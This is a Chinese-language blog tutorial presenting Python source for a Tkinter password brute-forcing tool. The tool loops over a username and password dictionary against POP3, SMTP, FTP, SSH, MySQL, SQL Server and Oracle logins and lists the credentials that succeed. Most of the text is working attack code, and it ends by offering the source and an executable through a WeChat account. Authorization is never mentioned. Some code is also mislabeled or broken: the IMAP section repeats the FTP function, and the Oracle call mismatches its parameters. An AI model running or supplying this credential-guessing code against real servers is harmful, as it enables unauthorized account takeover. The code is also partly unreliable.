1. 程式人生 > >太實用了!自己動手寫軟體——我們的密碼PJ器終於完成了

太實用了!自己動手寫軟體——我們的密碼PJ器終於完成了

之前我們完成了密碼破解工具的介面,今天我們來看看功能實現吧。

目錄

  • 編碼
    • 提交——功能實現
    • 開始破解——功能實現
      • 讀取密碼字典
      • 選擇協議並執行破解動作
        • POP3協議的破解函式
        • IMAP協議的破解函式
        • SMTP協議的破解函式
        • FTP協議的破解函式
        • SSH協議的破解函式
        • MySQL協議的破解函式
        • SQL server協議的破解函式
        • Oracle協議的破解函式
  • 實現效果
    • FTP協議
    • Oracle協議
  • 程式獲取

 

編碼

提交——功能實現

首先我們先完成“提交”功能的實現,“提交”按鈕的作用是將使用者填寫的伺服器地址、伺服器埠和協議型別資訊儲存起來,用於後面的密碼驗證。所以我們先定義了一個字典(因為oracle的資料庫連線必須要例項名,所以我們新增了一個db_name)。

1 dic_list = {'server_ip':'','server_port':'','pro':'','db_name':""}

獲取伺服器地址和埠我們定義了一個回撥函式gettext,將兩個Entry物件傳遞過來後,直接使用一個get命令就可以將Entry中的內容取出來,同時我們添加了對IP和埠的合法性校驗。

 1 def gettext(x,y):
 2     """
 3     獲取輸入框內容
 4     :param x: 輸入框物件——伺服器IP
 5     :param y: 輸入框物件——伺服器埠
 6     :return:
 7     """
 8     server_ip = x.get()
 9     server_port = y.get()
10     #判斷輸入的IP和埠是否合法
11     if (not re.match("[a-zA-Z0-9][-a-zA-Z0-9]{0,62}(\.[a-zA-Z0-9][-a-zA-Z0-9]{0,62})+\.?",server_ip)):
12         tkinter.messagebox._show(title="IP輸入不合法", message='請重新輸入合法IP')
13     # elif not(re.match("^?:([1-6][0-9]{1,4})|([1-9][0-9]{0,3})$",server_port)):
14     elif not(re.match("^[1-9]$|(^[1-9][0-9]$)|(^[1-9][0-9][0-9]$)|(^[1-9][0-9][0-9][0-9]$)|(^[1-6][0-5][0-5][0-3][0-5]$)$",server_port)):
15         tkinter.messagebox._show(title="埠輸入不合法", message='請重新輸入合法埠')
16     else:
17         dic_list["server_port"] = server_port
18         dic_list["server_ip"] = server_ip
19     print(dic_list["server_ip"],dic_list["server_port"])

對於協議型別的讀取,我們定義了一個回撥函式get_select,同時我們對協議是否選擇進行判斷,若沒有選擇則提示重新選擇協議。

 1 def get_select(y,list_pro):
 2     """
 3     獲取列表的選擇
 4     :param y:列表框物件
 5     :param list_pro:列表
 6     """
 7     for i in range(0, len(list_pro)):
 8         if y.selection_includes(i):
 9             #補充dic_list字典中的協議欄位內容
10             dic_list["pro"] = list_pro[i]
11         else:
12             pass
13     if dic_list["pro"]=="":
14         tkinter.messagebox._show(title="協議未選擇", message='請重新破解協議')
15     elif dic_list["pro"]=='Oracle':
16         dic_list['db_name']=getInput("Oracle例項","請輸入Oracle例項資訊")
17         print(dic_list['db_name'])

同時我們添加了一個對oracle協議的判斷,若選擇oracle協議則需要彈出一個視窗填寫資料庫例項名稱。我們新增了一個彈框輸入的函式get_Input進行呼叫。

 1 def getInput(title, message):
 2     def return_callback(event):
 3         print('quit...')
 4         root.quit()
 5 ​
 6     def close_callback():
 7         tkinter.messagebox.showinfo('message', 'no click...')
 8 ​
 9     root = tkinter.Tk(className=title)
10     root.wm_attributes('-topmost', 1)
11     screenwidth, screenheight = root.maxsize()
12     width = 300
13     height = 100
14     size = '%dx%d+%d+%d' % (width, height, (screenwidth - width) / 2, (screenheight - height) / 2)
15     root.geometry(size)
16     root.resizable(0, 0)
17     lable = tkinter.Label(root, height=2)
18     lable['text'] = message
19     lable.pack()
20     entry = tkinter.Entry(root)
21     entry.bind('<Return>', return_callback)
22     entry.pack()
23     entry.focus_set()
24     root.protocol("WM_DELETE_WINDOW", close_callback)
25     root.mainloop()
26     str = entry.get()
27     root.destroy()
28     return str

這樣我們的“提交”按鈕功能就全部完成了。接下來我們看看“開始破解”選單按鈕的功能。

開始破解——功能實現

我們定義了一個回撥函式為mimapojie

  1. 首先會讀取密碼字典

  2. 然後是選擇協議並執行破解動作

  3. 最後是展示破解結果

1 def mimapojie(server_ip,server_port,pro):
2     get_user_and_passwd('./test.xls', 0)
3     print_list = choice_protocol(server_ip, int(server_port), pro,dic_list['db_name'])
4     #展示破解結果
5     tkinter.messagebox._show(title='破解結果',message=dic_list['pro'],detail=print_list)

接下來我們依次看看這三個方面都是如何實現的。

讀取密碼字典

我們使用的是我們之前文章中使用的讀取Excel表格的方式,我們直接將第一列的內容讀取到user_list列表中,將第二列內容讀取到password_list列表中。

 1 def get_user_and_passwd(file_path, sheet_id):
 2     """
 3     獲取密碼庫中的使用者名稱密碼
 4     :param file_path: 密碼庫的路徑及檔名
 5     :param sheet_id: 密碼庫中的sheet id
 6     """
 7     read_excel = ReadAndWriteExcel.OpenExcel(file_name=file_path, sheet_id=sheet_id)
 8     rows = read_excel.get_lines()
 9     global user_list
10     global password_list
11     for i in range(0, rows):
12         if read_excel.get_value(i, 0):
13             user_list.append(read_excel.get_value(i, 0))
14         if read_excel.get_value(i, 1):
15             password_list.append(read_excel.get_value(i, 1))

選擇協議並執行破解動作

我們定義了一個選擇協議函式,根據獲取到的選擇協議欄位執行不同的破解函式。

 1 def choice_protocol(server_ip,server_port, pro,db_name):
 2     """
 3     選擇需要破解的協議
 4     :param server_ip:需要破解的伺服器IP
 5     :param server_port:需要破解的伺服器埠
 6     :param pro: 需要破解的協議
 7     :param db_name: oracle資料庫的例項名
 8     """
 9     if  pro == "POP3":
10         attempt_pop(server_ip, server_port)
11     elif pro == "IMAP":
12         print('this is a test')
13         attempt_imap(server_ip, server_port)
14     elif pro == "SMTP":
15         attempt_smtp(server_ip, server_port)
16     elif pro == "FTP":
17         attempt_ftp(server_ip, server_port)
18     elif pro == "SSH":
19         attempt_ssh(server_ip, server_port)
20     elif pro == 'MySql':
21         attempt_mysql(server_ip, server_port)
22     elif pro == "SQL Server":
23         attempt_mssql(server_ip, server_port)
24     elif pro == "Oracle":
25         attempt_oracle(server_ip, server_port,db_name)
26 ​
27     return print_list

POP3協議的破解函式

 1 def attempt_pop(server_ip, server_port):
 2     """
 3     破解POP3協議的使用者名稱密碼
 4     :param server_ip: 破解的伺服器IP
 5     :param server_port: 破解的伺服器埠
 6     """
 7     print("=======破解POP3協議========")
 8     print_list.clear()
 9     for i in range(0, len(user_list)):
10         for j in range(0, len(password_list)):
11             try:
12                 pop3_server = poplib.POP3(host=server_ip,port=server_port)
13                 pop3_server.user(user_list[i])
14                 pop3_server.pass_(password_list[j])
15                 #獲取郵件列表,用於判斷是否登入成功
16                 pop3_server.list()
17                 print_list.append("使用者名稱:%s,密碼:%s登入成功\n" % (user_list[i], password_list[j]))
18             except:
19                 pass
20     if not print_list:
21         print_list.append("密碼破解失敗")

IMAP協議的破解函式

 1 def attempt_ftp(server_ip,port=21):
 2     """
 3     破解FTP協議的使用者名稱密碼
 4     :param server_ip: 破解的伺服器IP
 5     :param port: 破解的伺服器埠,預設為21
 6     """
 7     ftp = FTP()
 8     ftp.connect(server_ip, port)
 9     global print_list
10     print_list.clear()
11     for i in range(0, len(user_list)):
12         for j in range(0, len(password_list)):
13             try:
14                 ftp.login(user_list[i], password_list[j])
15                 ftp.quit()
16                 print_list.append("使用者名稱:%s,密碼:%s登入成功\n" % (user_list[i], password_list[j]))
17             except:
18                 pass
19     if not print_list:
20         print_list.append("密碼破解失敗")

SMTP協議的破解函式

 1 def attempt_smtp(mail_host, port=25):
 2     """
 3     破解SMTP協議的使用者名稱密碼
 4     :param mail_host: 破解的伺服器IP
 5     :param show_flag: 標誌位,True代表展示破解失敗的使用者名稱密碼,False代表僅展示破解成功的使用者名稱密碼
 6     :param port: 破解伺服器的埠,預設為25
 7     """
 8     print("=======破解SMTP協議========")
 9 ​
10     global user_list
11     global password_list
12     print_list.clear()
13     for i in range(0, len(user_list)):
14         for j in range(0, len(password_list)):
15             try:
16                 smtpObj = smtplib.SMTP(timeout=3)
17                 smtpObj.set_debuglevel(0)
18                 smtpObj.connect(mail_host, port)  # 25 為 SMTP 埠號
19                 smtpObj.login(user_list[i], password_list[j])
20                 print_list.append("使用者名稱:%s,密碼:%s登入成功\n" % (user_list[i], password_list[j]))
21             except Exception as e:
22                 print(e)
23                 pass
24     if not print_list:
25         print_list.append("密碼破解失敗")

FTP協議的破解函式

 1 def attempt_ftp(server_ip,port=21):
 2     """
 3     破解FTP協議的使用者名稱密碼
 4     :param server_ip: 破解的伺服器IP
 5     :param port: 破解的伺服器埠,預設為21
 6     """
 7     ftp = FTP()
 8     ftp.connect(server_ip, port)
 9     global print_list
10     print_list.clear()
11     for i in range(0, len(user_list)):
12         for j in range(0, len(password_list)):
13             try:
14                 ftp.login(user_list[i], password_list[j])
15                 ftp.quit()
16                 print_list.append("使用者名稱:%s,密碼:%s登入成功\n" % (user_list[i], password_list[j]))
17             except:
18                 pass
19     if not print_list:
20         print_list.append("密碼破解失敗")

SSH協議的破解函式

def attempt_ssh(server_ip, port=22):
    """
    破解SSH協議的使用者名稱密碼
    :param server_ip: 破解的伺服器IP
    :param port: 破解的伺服器埠,預設為22
    """
    print("=======破解SSH協議========")
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    global user_list
    global password_list
    print_list.clear()
    for i in range(0, len(user_list)):
        for j in range(0, len(password_list)):
            try:
                ssh.connect(hostname=server_ip, port=port, username=user_list[i], password=password_list[j])
                print_list.append("使用者名稱:%s,密碼:%s登入成功\n" % (user_list[i], password_list[j]))
            except:
                pass
    if not print_list:
        print_list.append("密碼破解失敗")

 

MySQL協議的破解函式

def attempt_mysql(server_ip, server_port=3306,db_name='mysql'):
    """
    破解MySQL協議的使用者名稱密碼
    :param server_ip: 破解的伺服器IP
    :param show_flag: 標誌位,True代表展示破解失敗的使用者名稱密碼,False代表僅展示破解成功的使用者名稱密碼
    """
    print("=======破解MYSQL協議========")
    global user_list
    global password_list
    print_list.clear()
    for i in range(0, len(user_list)):
        for j in range(0, len(password_list)):
            try:
                # pymysql.connect(host=server_ip,port=server_port,user=user_list[i],passwd=password_list[j],db=db_name)
                db = pymysql.connect(server_ip, user_list[i], password_list[j])
                db.close()
                print_list.append("使用者名稱:%s,密碼:%s登入成功\n" % (user_list[i], password_list[j]))
            except:
                pass
    if not print_list:
        print_list.append("密碼破解失敗")

SQL server協議的破解函式

def attempt_mssql(server_ip, server_port):
    """
    破解SQL server協議的使用者名稱密碼
    :param server_ip: 破解的伺服器IP
    :param server_port: 破解的伺服器埠
    """
    print("=======破解SQL Server協議========")
    global user_list
    global password_list
    print_list.clear()
    for i in range(0, len(user_list)):
        for j in range(0, len(password_list)):
            try:
                db = pymssql.connect(server_ip,user_list[i],password_list[j])
                db.close()
                # print("使用者名稱:%s,密碼:%s登入成功" % (user_list[i], password_list[j]))
                print_list.append("使用者名稱:%s,密碼:%s登入成功\n" % (user_list[i], password_list[j]))
            except:
                pass
    if not print_list:
        print_list.append("密碼破解失敗")

 

Oracle協議的破解函式

def attempt_oracle(server_ip,db_name, port=1521 ):
    """
    破解Oracle協議的使用者名稱密碼
    :param server_ip: 破解的伺服器IP
    :param show_flag: 標誌位,True代表展示破解失敗的使用者名稱密碼,False代表僅展示破解成功的使用者名稱密碼
    :param port: 破解的伺服器埠,預設為1521
    """
    print("=======破解Oracle協議========")
    global user_list
    global password_list
    print_list.clear()
    for i in range(0, len(user_list)):
        for j in range(0, len(password_list)):
            try:
                cx_Oracle.connect(user_list[i]+'/'+password_list[j]+'@'+server_ip+':'+str(port)+'/'+db_name)
                # print("使用者名稱:%s,密碼:%s登入成功" % (user_list[i], password_list[j]))
                print_list.append("使用者名稱:%s,密碼:%s登入成功\n" % (user_list[i], password_list[j]))
            except Exception as e:
                pass
    if not print_list:
        print_list.append("密碼破解失敗")

實現效果

這樣我們的軟體就實現了,我們看一下ftp協議和Oracle協議的破解效果吧。

FTP協議

頁面填寫

破解結果

Oracle協議

破解介面配置同ftp介面,點選“提交”後會彈出輸入例項名的視窗,輸入例項名並回車即可。

因為菜鳥小白沒有搭建Oracle伺服器所以破解失敗的結果如下:

程式獲取

老規矩,關注公眾號“菜鳥小白的學習分享”。

    1. 回覆“密碼破解原始碼”即可獲得原始碼下載連結
    2. 回覆“密碼破解可執行程式”即可獲得工具軟體